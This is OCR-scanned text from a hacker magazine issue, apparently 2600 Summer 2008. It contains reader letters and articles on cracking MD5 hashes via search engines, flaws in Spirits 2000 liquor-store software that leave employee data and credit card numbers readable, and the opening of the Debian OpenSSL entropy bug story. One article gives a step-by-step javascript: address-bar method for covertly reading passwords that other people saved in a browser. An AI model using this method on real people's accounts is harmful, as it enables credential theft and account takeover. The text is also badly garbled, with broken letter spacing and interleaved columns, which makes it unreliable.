to get in the habi t of doi ng anyway.
mOuntainrebel
too much information about ourselves for no good
reason. Everyone has something they want to keep
to themselves and until that ' seen as a good thing
worthy of being encouraged, we're going to have a
tough time getting non-technical people to take these
basic precautions.
Dear 2600:
Thi s i s in response to Agent ZerO's Spri ng 2008
art i cl e "Password Memori zati on Mnemoni c. " Whi l e
hi s techn i que i s very si mpl e and easy t o use, i t does
create a great deal of ri sk. I f a password i s com
promi sed at one si te, then the attacker can make
a strongl y educated guess at the user's other pass
words; i f buy. com uses buy1 23, then Amazon prob
abl y uses amazon 1 23 . Th i s means that the most
i mportant passwords - eCommerce, onl i ne banki ng
- are onl y as safe as the weakpst si te the user Irp
quents. And s i nce many coders out there sti l l store
unencrypted passwords in the database, t hi s i s a very
ri sky proposi t i on.
I nstead of usi ng an easy-to-predi ct pattern, con
s i der usi ng di sti nct compl ex passwords, but stori ng
them securel y. I f you're on the Wi ndows pl atform,
Bruce Schnei er's free PasswordSafe i s easy to use
( and wri tten by an authori ty on cryptol ogy). Both OS
X and CNU/Li nux make i t easy to sPl up encrypted
part i t i ons and/or di s k i mdges that can be used to
store passwords.
Al so, remember to change passwords frequent
l y. Once you're i n the habi t of tracki ng a l arge set
of passwords, you mi ght be surpri sed how qui ckl y
your fi ngers wi l l remember t hem, even i f your brai n
doesn' t.
creepyinternetstal kerdude
Problems
Dear 2600:
Thi s a message for peopl e out there that I need
hel p on undernet server #transl ate. There i s a person
who needs to have a remi nder about abusi ve acti ons
taken on #transl ate. They have banned peopl e be
cause they thi n k that there was a spam goi ng on by
me and they need to remember that i f th,y use mi re
for i l l egal purposes that they shoul d be charged and
banned from mi rc for l i fe.
Thei r namp i s @moni q so remembpr t hi s name
and l et t hi s person know about i t.
And t hi s i s a gl obal message to al l 2600 fans out
there so pl ease come i n ASAP and thank you for the
hel p.
Morgan
Have you been outdoors at all this year? There a
whole world beyond IRe trust us. And even if there
wasn't, it would be extremely difficult to figure out
how we could possibly care less about any of this.
We hope we were able to help.
Dear 2600:
Not real l y an arti cl e, but unsure of where to send
thi s to.
Di d you guys know Borders i n NSW, Austral i a
are sel l i ng 2600 for 1 8 bucks an i ssue! I know i t's
great that they sel l it at al l , but makes me gl ad I 've
subscri bed through the websi te.
route
While perhaps your everyday computer nerd will
be able to get into this habit, that won't accomplish
much insofar as getting your parents and grandpar
ents to achieve the same level of protection. First,
the method has to be simple, intuitive, and secure.
Second, and most importantly the people must be
enlightened to the concept of not leaving everything
out in the open. Too many of us willingly give away
It' almost not really a letter too. But it's ao inter
Summer 2008
Pa
g
e 45
esting factoid The Australian dollar at press time is
worth 95 American cents so it', almost exactly even.
Even with all of the various charges that go into over
seas distribution, charging nearly 200 percent over
our cover price doesn't seem justified Someone\
making a lot of of us. And i t ain't us.
Dear 2600:
Hi , I 've your Spri ng 2008 i ssue in hand. OK on
the change (agai n) in bi ndi ngs. I ' l l keep up whatever
you do. Thi s i s by the way, one of those topi cs where
di scussi on can never end because both si des are
ri ght.
You rs i s one of the l argest magazi nes i n pri nt, to
my eye, and that's good. There i s however, a topi c I 'd
l i ke to see getti ng your speci al down and gri tty treat
ment. It is: where i s al l t hi s crudware on Usenet com
i ng from? I t has now ki l l ed the useful di scussi on that
used to be there; the bri ght and i nteresti ng peopl e
have now gone somewhere el se, for good reason,
but the wastel and that's l ef, ful l of vari ous crazy and
sub-adol escent verbage, i s a sorry t hi ng to see.
See rec. arts. sf.fandom, for i nstance; or compo
os. l i nux. advocacy. They're broken now.
I t concerns me because 1 ) I t hi nk i t's meant not
as nui sance but as censorshi p; and 2) i nnovati on
comes i n from the fri nges and Usenet used to be a
very good fri nge. So I t hi nk t hi s is a topi c val uabl e to
al l of us, al though some out there may di sagree wi th
that. Doesn't someone have at l east a very good i dea
where that crapware and scatware i s comi ng from?
Actual l y, I 've been sl i ghtl y puzzl ed about Usenet
al l al ong. Because when I l ooked at books on the
topi c of the I nternet and cyberspace, al l sorts of
resources were menti oned but Usenet was not. Yet
l ooki ng at i t, I thought ( used to be) it was the most
a l i ve and i nteresti ng part of cyberspace.
Martha Adams
First, when did we become one of the largest
magazines in print? We must have missed something.
As for Usenet, yes, it' sucked for quite a while now
Moderated newsgroups are really the only possible
means of having interesting discussions and getting
useful information, provided of course that the mod
erators don't abuse their power. Uncontrolled news
groups invariably lead to chaos and spam. There are
exceptions but you'd be hard pressed to fnd them
on Usenet.
Dear 2600:
I l i ve in Frederi cton, N. B. , Canada and the spri ng
i ssue j ust hi t the shel ves today. I was wonderi ng i f i t
was ever goi ng t o come. I l ove the quarterl y! Now, I
don' t know if you al ready know t hi s or not but when
I started goi ng through the i ssue I was a bi t di sap
poi nted because there are pages that are repeated
(doubl es of page 24 and so on) t hroughout the i s
sue and art i cl es i ncompl ete or mi ssi ng because of
thi s. J ust thought that I woul d say somethi ng i n case
someone el se hasn't yet.
Krista
This is a problem that seems to have affected
some readers in Canada. The printer tells us it didn't
happen to a large number of issues. Our readers are
vital in letting us know when such problems occur
and how widespread they are. If you find yourself
stuck with a defective issue, email subs@2600. com
and we'll take care of it.
Dear 2600:
Someone named Bar rett wrote a great pi ece
about Crapi pedi a i n the l atest i ssue. Great j ob, and
very accurate. I 've r un i nto the same probl ems try
i ng to post a l i st i ng ibout a publ i c fi gure i n my area
( northeast U . 5. ) and eich t i me I tri ed t o post i t , some
sel f-appoi nted "edi tor" woul d take i t down, cal l i ng
it a personal attack. I ' m a l awyer and I know exact l y
what i s and i s not I i bel ous or s l anderous. I took spe
ci al care not to pri nt anythi ng that wasn't properl y
backed up wi t h ci tati ons, but i t made no di fference -
t hi s story was not about to be publ i shed regardl ess of
facts or hi stori cal si gni fi cance of the person.
After appea l i ng to what seemed l i ke a constant l y
changi ng panel of sel f-appoi nted experts, I real i zed
Wi ki pedi a "edi tors" and admi ni strators don't even
read thei r own rul es and such items are ofen re
moved based on personal preference and pol i ti cal
agenda.
Barrett i s too correct - Wi ki pedi a i s al l about who
the "edi tors" (teenage Bl ockbuster vi deo empl oyees
l i vi ng in mom's basement) agree wi th, not who's
ri ght.
Sneak Email from a Vendor
Dear 2600:
Today I was appal l ed to fi nd out that the 3G net
work "3" di scri mi nates agai nst 2600. com. When try
ing to access the si te on my mobi l e I was i nformed
by Yahoo (thei r back end) that the si te I wi shed to
access was unavai l abl e. After contact i ng customer
care I was i nformed that si tes are "fi l tered." I pre
sumed that meant adul t content but i t l ooks l i ke
"3" doesn't l i ke 2600. I was tol d that if I wi shed to
submi t a request to access the si te I shoul d emai l
customer. servi ce. i e@3mai l . com. I thi nk you shoul d
too.
Pddy
We'd like to know if others have experienced the
same thing. Thanks for writing.
Dear 2600:
I ordered some ni ce sweats hi rt in order to sup
port you and to l ook gorgeous. Everyt hi ng went fi ne.
But after tryi ng to gi ve you the best rat i ngs i magi n
abl e I got the fol l owi ng error message: "The U RL you
speci fi ed coul d not be found. Pl ease check the URL
you entered and try agai n." Maybe a known prob
l em, maybe not. J ust wanted to tel l you. I assume I
fi l l ed out the form correctl y.
Regards from Austria
Markus
That does happen on occasion but it most always
is a situation that resolves itself after a few hours. We
suggest trying a few times. If it persists over days,
then it would be worth pursuing.
Dear 2600:
I have purchased your Off The Hook di scs and
deci ded I wanted to l i sten to them on my Appl e i Pod
Touch t hi ngy. I used a fi nd . -name "*. mp3" -exec cp
{ } IUsers/ni ckiMusi c/Off-The-Hook command and
ended up wi th a huge number of mp3 fi l es. Unfortu
natel y, due to some crazy date scheme, they are not
in any sensi bl e order. My pl ea i s t hus: pl ease use the
I nternati onal Date scheme when nami ng dated fi l es.
Thi s i s year, month, and day. Thi s al l ows comput-
Pa
g
e
4
6
2600 Ma
g
azine
ers to automati cal l y sort fi l es. Now I ' l l have to wri te
somet hi ng dreadful i nvol vi ng awk to ass i mi l ate sai d
fi l es.
The very ki ndest of regards from a somewhat sunny
and warm southern Engl and
Ni ck (or shoul d that be N1 ck perchance?)
You'll find the later years are in the sensible order.
One of these days we'll get around to fixing the file
naming scheme of the earlier years. We will cheer
fully post any programs that automate the renaming
process on our website.
Dear 2600:
I wrote to the subscri pti on department to see i f
my i ssue had been mai l ed to me because I hadn't re
cei ved it at the begi nni ng of May. Your company was
ki nd enough to mai l me out another i ssue. I wanted
to thank you for doi ng that. I al so wanted to wri te to
i nform you that the reason I got my post office box
was because my mai l woul d often become "l ost."
Now i t's happeni ng at my post o
f
i ce box and i t i n
vol ves the onl y magazi ne I woul d ever subscr i be t o!
I went and i nqui red at the post office t o see i f
my i ssue t hat was l ost had been found. The l ady at
the counter i nformed me t hat the postmaster wasn't
there and I woul d have to speak to her. I tol d her of
my si tuati on and she went and l ooked for it. Need
less to say, she di dn't fi nd it. She did however i nform
me that the peopl e around my box are el derl y and
they woul dn't take my magazi ne wi thout gi vi ng i t
back. I wanted to l et you know t hat whether i t be
by acci dent or on purpose my i ssue was l ost. Who
knows, an el der l y woman may be tryi ng her hand at
eavesdroppi ng wi th LD_PRELOAD!
I al so saw t hat a l ot of peopl e wi t h the name of
Jeff wrote l etters in the last i ssue. I ' m gl ad I put "The"
in front of my name.
The Jef
Dear 2600:
Over the years I 've read many l etters in your
magazi ne about how numerous i ndi vi dual s have
been si ngl ed out unfai rl y by ei ther vi ewi ng your
websi te or by bei ng i n possessi on of t he 2600 pub
l i cati on i tsel f.
I now am one of those proud martyrs. I 'm fi n i sh
i ng out the l ast year and a hal f of a si x year pri son
sentence at Del aware Correcti onal Center. On Feb
ruary 8th my cel l was shook down whi l e I was at a
typi ng cl ass. When I returned to my bui l di ng a l i eu
tenant pul l ed me asi de and i nformed me that I was
bei ng wri tten up for possessi on of non-dangerous
contraband.
When I asked what thi s contraband was, he tol d
me i t was two i ssues each of 2600 and Make Maga
zine. Confused, I asked how they coul d be consi d
ered contraband when the pri son mai l room here has
been al l owi ng me to recei ve these mags for the past
three years and anythi ng the mai l room here consi d
ers a secur i ty threat they woul d not al l ow the i nmate
to have.
The l i eutenant, l ooki ng equal l y confused (or
maybe i t was j ust the bl ank stare of a man wai t i ng
out the workday cl ock), gave me the "I ' m j ust t he
mi ddl eman here" speech and tol d me I 'd be moved
to a h i gher securi ty area to awai t my hear i ng. Now
I ' m on a near 24/7 l ockdown.
My poi nt to al l out there readi ng t hi s i s s i mpl e.
Don' t wal l ow i n sel f pi ty i f you're ever s i ngl ed out
by fear peddl ers. Use whatever s ki l l s you have to
show those i gnorant of your passi ons that you're
dr i ven by a heal thy curi osi ty, not a mal i ci ous nature.
Don't waste t i me argu i ng wi th mi ddl emen, go to the
source. I f you're barred from doi ng i t i n person, don' t
underest i mate the powerful proxy of presence usi ng
repeated correspondence. Keep up t he good work
2600, your pages trul y are the few remai n i ng bas
ti ons of ori gi nal i ty and free thought l eft.
Cood Thin
gs
Dear 2600:
Max Rider
SBI 00383681
Uni t 2 1 , DCC
1 1 81 Pddock Rd.
Smyrna, DE 1 9977
I j ust found 2600 whi l e browsi ng at Barnes &
Nobl e. What a great s urpr i se and treat. I am send
i ng for a subscri pti on today! I was one of the "ol d
ti me" hackers who di d nothi ng at n i ght but crack
C64 games and programs. I 've been out of i t si nce
the end of the 80s and haven' t spoken to any of my
ol d "fel l ow hackers" si nce then. I am amazed at the
content of you r magazi ne and wi sh a thousand more
years of success!
ExPhil lyMM
Dear 2600:
Regardi ng the return of the stapl ed spi ne . . . Thank
you ! Thank you ! Thank you !
Apathy
Dear 2600:
I j ust received 2 5 : 1 and it was onl y by the ti me
that I got to page 45 under "Observati ons" afer read
ing Check Check's comments about the bi ndi ng that
I real i zed you guys are back to usi ng the cl assi c two
stapl es i nstead of the gl ue bi ndi ng. It was a moment
of Zen as I real i zed that thi s i s why i t fel t so comfort
abl e in my hand and why i t opened so n i cel y maki ng
i t easi er to read and enj oy. Thanks for the change, i t
real l y means a l ot!
Israel Torres
Dear 2600:
I j ust fi ni shed readi ng an art i cl e in the l atest 2600
magazi ne, and I was fl i ppi ng back to the contents
when I real i zed that t hi s i ssue was stapl e-bound. I
l i ke to fol d the magazi ne al l the way back so that
I can hol d i t i n one hand whi l e readi ng. I l ove the
stapl e-bi ndi ng so much more than the gl ue-bi ndi ng
we had i n 2007! Thanks for swi tchi ng back.
Lex
We really had no choice after a year of one prob
lem after another. It would have been nice if the oth
er binding had worked out but for whatever reason it
didn't, so staples it is.
I mmortal ize yourself with a good old-fashioned
letter to 2600. Simply email letters@2600.com
or send snail mail to
2600 Letters, PO Box 99,
Middle Island, NY 1 1 953.
I t may be the best decision you make this year.
Summer 200B g
e 47
by Acrobati c
CRacKiLG wi rh rhE
WEbrioLaRY: UsillG
GOOGlE aid Yahoo! TO
LiG hT-ORCE all (almOST)
IltlliTE DicTiollaRY
wi th mi l l i ons of hashes and t hei r respecti ve
pl ai ntexts, i ndexed by Googl e and Yahoo! for
Attacks on cryptographi c schemes have
us to peruse. The i nternet has essenti a l l y
been around for years. Genera l l y, the most
become both a di stri buted computi ng r i ng and
successfu l attacks rel y on ti me, powerfu l
a h uge di ct i onary for us to brute-force from-a
processors, and a l arge pool of data from
webt i onary.
whi ch to test cracki ng attempts.
Granted, th i s i s n' t near l y as easy for more
One way of al l evi at i ng the t i me probl em secure passwords or for passwords that have
and t hus the processor probl em is to have
been sal ted and then hashed. ( Sal t i ng i s
more t han one cracker worki ng on t he
addi ng text t o a password before encrypt i ng i t,
probl em s i mul taneousl y. We see the effects
then usi ng that same text to ai d i n the decryp
of thi s i n contests l i ke di stri buted. net ' s Project
t i on. ) However, a vast maj ori ty of peopl e
ReS, whi ch used di st r i buted comput i ng to
use passwords that are very easy to deci pher
crack previ ousl y uncrackabl e ci phers, havi ng
if you know the hash. Gett i ng the hash is a
hundreds of thousands of peopl e empl oy thei r
di fferent probl em i n i tsel f, and I ' l l get t o that
computers towards the goal of testi ng every
in a second.
poss i bl e key unti l t he correct one i s found.
Us i ng PHp I wrote a program t hat takes
Many attacks on encrypted passwords rel y
care of t he di rty work for you. I t does a
on di ct i onary attacks, i n whi ch weak pass-
Googl e search for a hash, scans the resul ts,
words a re guessed by test i ng them agai nst
sorts them by word frequency, and uses that
mi l l i ons of entri es of pl ai ntext words i n a fi l e
rel ati vel y sma l l subset as a cracki ng di ct i onary
or database. Often, these reposi tori es can be
to fi nd a match. If it fi nds a match, it returns
found spl i t i nto themes, such as huge l i sts of
the pl ai ntext to you, so you don ' t have to
personal names, pl aces, or common l y used
search a l l the pages manual l y. I f the Googl e
passwords. The l arger your pool of data, the
search i s unsuccessfu l , the prog' ram does a
better your chances of success-but the l onger
search wi th Yahoo! ; i t scans the URL t i t l e, the
i t wi l l take to test every poss i bi l i ty.
Yahoo! summary of the page, and fi nal l y, i f
I t was recent l y poi nted out t hat crypto-
that fai l s, the page i tsel f, and performs s i mi l ar
graphi c hashes such as MDS can be reversed
anal ys i s as we di d wi th the Googl e res ul ts.
us i ng search engi nes such as Googl e. For I or i gi nal l y thought about creat i ng a
exampl e, searchi ng for the MDS hash of
huge database ful l of deci phered hashes as
" 5 f 4 dcc3 b5 aa7 6 5 d 6 1 d8 3 2 7 deb8 8 2 cf 9 9 " a backup when the webt i onary search fai l ed,
takes l ess than a quarter of a second but the poi nt of the project i s not t o become
to return over 500 pages wi th both a cracki ng database, but rather to show the
5 f 4 dc c 3 b5 aa7 6 5 d6 1 d8 3 2 7 deb8 8 2 c f 9 9 power of us i ng the web and search engi nes
and the word "password" i n them, i n cl ose
to do a l l the hard work. Besi des, you can fi nd
proxi mi ty t o each other. ( I t i s no coi nci dence scores of these databases across the web;
that "password" i s one of the top 1 0 most
for exampl e, GDataOnl i ne . com al one has
frequentl y used passwords. )
a l most 900, 000 sol ved hashes.
Remember our three cri ter i a for i ncreasi ng As you ' l l see i n the source code, I di d bui l d
success at cracki ng? We' ve j ust used one
i n the abi l i ty t o use a database, but t hi s i s onl y
computer, a search engi ne, and l ess t han a
for stor i ng passwords whi ch have a l ready been
quarter of second to crack an "uncrackabl e"
deci phered usi ng the scri pt. Thi s is because
hash. By us i ng search engi nes, we use Googl e the search engi ne APl s I use onl y a l l ow a
and Yahoo! ' s i mmense catal ogs of i ndexed
l i mi ted amount of l ookups per day. I ' l l l eave
pages and thei r thousands of server processors
the database wri te method turned of unti l the
to search for a hash on the same page as i ts search engi nes start bl ocki ng access because
pl ai ntext equi va l ent.
I ' ve used up my l i mi t.
I magi ne the poss i bi l i ti es: mi l l i ons of pages Us i ng t hi s scri pt, I ' ve been abl e to fi nd the
Pa
g
e 4
8
2600 Ma
g
azine
matches for hundreds of hashes i n l ess t han a
few seconds each. I t ' s i mportant to remember
that thi s i s not a cracker-i t ' s a fi nder. I nstead
of brute-force, I l i ke to cal l i t " l i ght-force. " I f
the hash and pl ai ntext haven ' t been posted to
the web and i ndexed by the search engi nes,
t hi s sni pt won ' t hel p.
J ust for fun, I used t he scri pt t o search for
thi s hash: 3 2 b9 9 l eS d7 7 ad1 4 0 S S 9 f fb9 S
-S 2 2 9 9 2 dO
Yahoo! found and returned the pl ai ntext
"2600" to me i n 1 . 074 seconds. Thi s means
that somewhere out there, someone has used
and deci phered "2600" as a password and
posted i t on t he i nternet.
Whi l e wri ti ng thi s program, I i nvesti gated
and i nspected many pages of res ul ts from
search engi nes. I was shocked by the number
of pages I found t hat were database dumps of
user i nformati on, i ncl udi ng contact i nforma
ti on, secur i ty questi ons and answers, pri vate
message l ogs, and more, tucked away al ong
wi t h t he MDS hashes of thei r passwords i n
var i ous webs i tes across the wor l d, where
thei r owners probabl y thought they were safe.
by Jacob P. Si l vi a
jacob. si l vi a@gmai l .com
I ntroduction
Have you ever been on a publ i c computer,
gone to a si te requi r i ng a l ogi n, and real i zed
that the person us i ng the computer before you
stored hi s or her password on that computer?
You can then l og i n to the account, pl ay wi th
the setti ngs, or change the user name to I ma
Tool or the defaul t l anguage t o Esperanto, but
many si tes won ' t l et you change the password
to one of your own choos i ng unl ess you know
what the previ ous password was. Thus, no
matter what changes you may make, I ma wi l l
sti l l be abl e to l og i n agai n, change the name
and l anguage back, and maybe even change
the password.
Before I conti nue, I shoul d menti on that you
A more nefar i ous programmer cou l d wr i te a
scri pt to search each of these hashes and eas i l y
compromi se webs i tes and user accounts.
Thi s shou l d once aga i n be a remi nder to
programmers to al ways secure your data. At
l east sal t your users' passwords before stor i ng
t hem on the web. And i t ' s al ways a good i dea
to test the strength of your own password. You
can create an MDS hash of a pl ai ntext word
i n L i nux or as x by typi ng mdS - s pl ain
text, or fi nd one of t he many MDS genera
tors on the web. Then, see i f the program can
deci pher your hash . .
My worki ng model can be found at
ht tp : / /www . bi gtrapez e . com/mdS / .
The source code can be found at
h t tp : / / www . b i g t rape z e . c o m/ md S /
s ourc e / or i n the 2 600 code reposi tory.
The scripts mentioned in this
article can be downloaded from
the 2600 Code Repository at
http: //www2600. com!code/
warni ng agai nst passwords wi thout taki ng the
necessary precauti ons to secure them.
Th i s i s not the most techn i cal arti cl e on
password recovery. I n fact, i t' s so easy that a
scri pt ki ddi e coul d do i t. I know that there exi st
tool s, and maybe even browser extensi ons,
that wi l l retri eve stored passwords for you i n
moments, but for the sake of argument we' re
pretendi ng that we' re on a computer that we
can' t easi l y or qui ckl y i nsta l l software onto and
t hat we onl y have access t o the web browser.
We al so want to make it l ook to the casual
eavesdropper that we' re actual l y j ust surfi ng
the web, mi ndi ng our own busi ness. We don ' t
want to, and i ndeed mi ght not be al l owed
to, do somethi ng l i ke run n i ng regedi t when
we' re, for exampl e, at a l i brary, or when at a
the house of a fr i end who' s i n the other room,
mi crowavi ng a Hot Pocket or somethi ng.
shou l d never rea l l y l og i nto someone el se' s Suppl ies
account and change setti ngs, nor shoul d you You ' l l need a few t hi ngs. The fi rst i s access
compromi se anyone' s password. Thi s arti cl e t o a browser wi t h stored passwords, prefer-
is meant both to i nform, by expl ai n i ng how abl y I E 6+ or Fi refox 2 +, as I haven ' t tested
to retri eve passwords easi l y, and to cauti on, t hi s method on other browsers. You ' l l al so
Summer 2008
Pa
g
e 49
need a bi t of knowl edge of HTML DOM and
j avaScri pt, the abi l i ty t o i ncrement and decre
ment i ntegers by 1 in your head ( i . e. , to count),
and the abi l i ty to remember two numbers. I t ' s
a pl us i f you can type qui ckl y and i f you can
di stract you r mar k for l ong enough t o carry out
the password retri eval . I t' s al so handy to carry
a pen and a notebook i n order to j ot down
your fi ndi ngs.
JavaScri pt and the HTML DOM
Now, a s l i ght asi de to di scuss J avaScr i pt
and the HTML DOM ( Document Obj ect
Model ) : i f you weren ' t aware, most browsers
a l l ow you to execute JavaScr i pt from the
address bar. (See "Javascr i pt I nj ecti on, "
2 600 Autumn 2 005. ) I t' s a s i mpl e matter of
typi ng j avascript : command ( ) , for some
command, i nto the browser ' s address bar. For
exampl e, j avascript : al ert ( ) wi l l pop
up a bl ank di al og box.
The HTML DOM i s one of the best
t hi ngs to happen to peopl e who l i ke doi ng
powerful t hi ngs wi th otherwi se un i nter
esti ng web pages. Us i ng JavaScri pt, you can
change practi cal l y any parameter on any
tag, and you can even make new tags. You
may, if you ' re so i ncl i ned, use JavaScr i pt to
modi fy the DOM and so al ter the page you ' re
vi ewi ng to s ui t your preferences, though
thi s exerci se i s l eft to the reader. Check out
ht tp : / / www . w3 s choo l s . com/htmldom/
'de faul t . asp for an i ntroducti on to the
HTML DOM.
There are three parts of the DOM that you
need to concern yoursel f wi th are: document,
the DOM' s parent obj ect; forms, the ar ray that
hol ds the document' s forms; and el ements,
t he array that hol ds t he el ements of t he form.
Si mpl e, eh? Okay, so now that nobody' s
watchi ng, i t ' s t i me to work ou r magi c.
Procedure
Step 1 . Open the browser. I f your mark i s
sti l l on your shou l der, j ust surf t o some i ncon
spi cuous si te unti l you can get hi m or her go
away. Gone yet? Good.
Step 2. Surf to the si te wi th the stored
password. I f there i s n' t a l ogi n screen on the
mai n page, go to the l ogi n screen. See those
dots, aster i sks, or whatevers? That' s what we' re
goi ng to uncover.
S
tep 3. Type j avascript : al ert ( docu
'ment . forms . l ength ) i nto the addressbar
and press enter. Remember the number that
pops up. Let ' s cal l i t x. I f t hi s step does n' t work,
ensure that you typed everythi ng correctl y. I f
i t sti l l i s n' t wor ki ng, you may have to resort to
more guerri l l a tacti cs to get your passwords.
Sorry!
Step 4. For each n umber from 0 to x 1 , try
j a v a s c r i p t : a l e r t ( d o c u m e n t .
forms [ x] = name ) and l ook for somethi ng
promi s i ng, s uch s uch as " l ogi n" or a s i mi l ar
name. I f x i s 1 , t hen congratu l at i ons: you don ' t
need t o worry about t hi s step!
Step 5. Once you have the ri ght va l u eof x, do
j a v a s c r i p t : a l e r t ( d o c u m e n t .
'f o r m s [ x ] . e l e m e n t s . l e n g t h ) .
Remember thi s number; l et ' s cal l it y.
Step 6. Now, for each number from a to
y - 1 , try j avas cript : al ert ( document .
'forms [ x] . el ements [ y] . name ) unti l
you get "password," "pi n, " or somethi ng
s i mi l ar.
Step 7. Let your heart go tha-thump; you ' re
about to see a password that you' re not
supposed to see!
Step 8. Type j avascript : al ert ( docu
'me n t . f o r m s [ x ] . e l e me n t s [ y ] .
'value ) . Qui ckl y memori ze or wr i te down
the password. Taki ng note of the user 1 0 wi l l
be a great hel p, too. Then, qui ckl y surf back
to your i nconspi cuous si te before your fri end
comes back wi th t hat Hot Pocket or t hat batty
ol d l i brar i an wonders what you ' re doi ng.
Whew! I f you successful l y kept your cool
dur i ng thi s tri al , go ahead and gi ve yoursel f a
pat on the back, and keep an eye on the papers
for audi t i ons to be i n the next Mi ssi on: I mpos
s i bl e movi e.
Comments
Steal i ng i s wrong, at l east for some senses
of the words steal i ng, i s, and wrong. Don ' t
abuse t he knowl edge presented i n thi s arti cl e,
because I ' m not respons i bl e if you somehow
break a l aw or company pol i cy by doi ng thi s.
As I menti oned ear l i er, thi s has onl y been
tested on I E and Fi refox. These are the onl y
two browsers that many peopl e thi n k about;
however, there are many other browsers out
there-you know what they are, or Googl e
does i f you don ' t. Feel free t o try thi s on other
browsers. I f i t works, huzzah; i f not, boo-hoo.
Be aware that you may l eave a tra i l of your
acti ons, especi al l y i f your fri end or l i brary has
some sort of keystroke tracki ng.
Feel free to come up wi th a more effi ci ent
or sneaki er way t o do t hi s. I ' d l ove t o hear
about i t, and I ' m sure that the rest of the readers
woul d too. Or, i f you woul d rather protect
your "fl ock" from the "wol ves" who wi l l sur el y
use thi s techni que or some ot her method to
compromi se accounts, you may turn off the
browser ' s password storage prompt and save
everyone a l i ttl e bi t of a headache.
Thanks for readi ng!
Pg
e 50
2600 Ma
g
azine
by drl ecter
Disclaimer: This article is for informational
purposes only. If you
g
et cau
g
ht, it ' s not my
problem. You shouldn't have been so stupid.
Unti l recent l y, I worked at a rather n i ce
l i quor store. We used a software su i te cal l ed
Spi r i ts 2000, whi ch has been wi del y used i n
retai l l i quor stores s i nce the 1 980s. I t was
created by Atl ant i c Systems I ncorporated
(AS! ) . I read i n a beverage magazi ne that the
Spi r i ts 2000 package starts at $ 1 0, 000. Thi s
software keeps track of everyth i ng, i n c l udi ng
i nventory, s al es, empl oyee i nformati on, s hi p
ments, and much more. It is a pretty robust
system.
The bra i n s of the software su i te i s cal l ed
Spi r i ts Backroom. Backroom control s every
th i ng from pr i ces to empl oyee i nformati on to
i nventory adj ustments-the whol e n i ne yards.
The pl ace I worked at had several computers
run n i ng th i s software, and any change made
on one computer wou l d automati cal l y update
the data on the others through a process cal l ed
pol l i ng. So, i f I sol d a bott l e of J ack from one
of the regi sters, the dat a fi l es on al l of the other
computers wou l d be updated wi th the s al e
i nformati on; t hat i s, the sal e pr i ce, di scount
gi ven, t i me and date, and so on. There are
several di fferent secur i ty l evel s you can assi gn
user s. The basi c l evel a l l ows users t o l ook up
t he cost of an i tem and pr i nt pr i ce tags. That ' s
about i t. The next l evel a l l ows you t o change
pr i ces and product names, di sconti nue prod
ucts, and add or del ete i tems . Other l evel s
i ncl ude t he abi l i ty t o gi ve di scounts, do pr i ce
matchi ng, and ret ur n i tems. The bosshas the
h i ghest l evel of permi ssi ons of course. He has
access t o a l l of the empl oyee data i nc l udi ng
name, address, date of bi rth, a l ar m codes,
soci al secur i ty n umber, and rate of pay.
Here is the probl em, though.
Through Backroom, you have to have
the management password to access
empl oyee i nformati on, but I found that
i f you navi gate t hrough the fi l e system to
C : \ KSV\ Da ta, there are a bunch of data
fi l es. One of the more i nterest i ng ones i s
emp. cdx. I f you open t hi s fi l e i n notepad,
i t i s barel y readabl e; i t ' s not even a comma
del i mi ted fi l e. I f, i nstead, you open I t I n a
program such as Mi crosoft Vi sual Fox Pro, i t
opens as a n i ce neat database, di spl ayi ng a l l
of the empl oyee i nfo for a l l empl oyees, past
and present: everyth i ng that management has
access to, but wi t hout a password. I t i s a l so
possi bl e to access the j our nal fi l es that conta i n
i nformati on on a l l of the sal es, the i nventory
fi l es, and j ust about everythi ng that upper
management does n' t want you to have access
to. To make matters worse, the company that
set the system up, AS! , set every computer
to share the entire c : \ dr i ve wi th read and
wr i te access! I am s ure you can i magi ne some
scary poss i bi I i ti es.
Another probl em wi th thi s r i di cu
l ous set up i s t hat the l ast credi t or debi t
card r un on each regi ster i s stored
ei ther i n C : \ KSV\ cLedi L caLCs .
-txt or C : \ KSV\ debi t card" . txt.
Al l of t he credi t card data i s stored here:
the ful l n umber, the expi rati on date, and
t he customers name. So, wi t h a coupl e of
passes over the regi sters, you can get qu i te a
few di fferent credi t card numbers. There are
qui te a few more t hi ngs that you can access
or change i n the data di rectory, and much
fun can be had wi t h . i n i fi l es, but t hat i s
beyond t he scope of th i s art i cl e.
I menti oned a coupl e of these probl ems to
the tech they sent out one ti me, and a l l he
sai d was, "We aren ' t tal ki ng nati onal secu
r i ty here. " That was very di st ur bi ng, t o say
the l east. So I thought that maybe an arti cl e
i n a wi del y- read hacker magazi ne mi ght get
thei r attent i on. Oh, I a l most forgot: they set
the router to be remotel y access i bl e, wi th a
4 character password, a l l l owercase l etters,
that I guessed i n about 3 mi n utes. I n fact, i t i s
t he stri ng of characters I us e for ema i l subj ects
when I am too l azy to th i n k of somethi ng.
Gett i ng the I P address was easy too; I woul d
j ust send my boss an ema i l about someth i ng,
and then check the headers i n hi s repl y. I n
c l osi ng, I wou l d l i ke to say that I hope t hi s
arti cl e does s ome good, and maybe hel ps to
protect the pr i vacy of l i quor store empl oyees
and customers a l l over the country.
Hello to Mom, Dad, and Sam.
Summer 2008
Pa
g
e 51
/How to Neuter Cryptography for Thousands of Users in Two Lines "
Two years ago a vendor made a nonstan
dard modi fi cati on t o a cryptography l i brary
used by thousands of systems for SSH,
VPN, SSL, and most ot her encrypted traffi c.
For two years t hi s change went undetected,
i ntroduci ng weaknesses i nto the key gener
ati on and encrypted traffi c.
Sound l i ke a l arge commerci al vendor
( synonym: sma l l , l i mp) col l udi ng wi th a
spy-happy government to weaken cryp
tography to ease s urvei l l ance? A forei gn
governmental agency hopi ng to accom
pl i sh the same? Wou l d you bel i eve an
open source devel oper on arguabl y one
of the most mi l i tantl y GPL and open Li nux
di st r i but i ons, on a compl etel y open sou rce
project?
I n September of 2006, a Debi an devel
oper fol l owed a warni ng from t he memory
audi t i ng tool s pur i fy and va l gri nd, and
i denti fi ed a potenti a l read of uni ni t i al i zed
memory i n OpenSSL, and commented out
the offendi ng l i ne. Unfortunatel y thi s l i ne
added the suppl i ed data to the entropy
pool , effecti vel y removi ng the randomness
at the heart of the cryptographi c engi ne.
Thi s change was then pi cked up by Ubuntu,
and presumabl y any other Debi an-based
di stri buti on.
The entropy pool i s used t o create
pseudo-random ( si nce very l i ttl e in a
computer is actual l y random) data used to
create cryptographi c keys. Typi ca I l y entropy
comes from a combi nati on of sources,
such as networ k packet rate, di s k 1 0 char
acter i st i cs, typi ng rates, mouse movement,
and on systems whi ch provi de it, a random
number generator i n hardware. The kernel
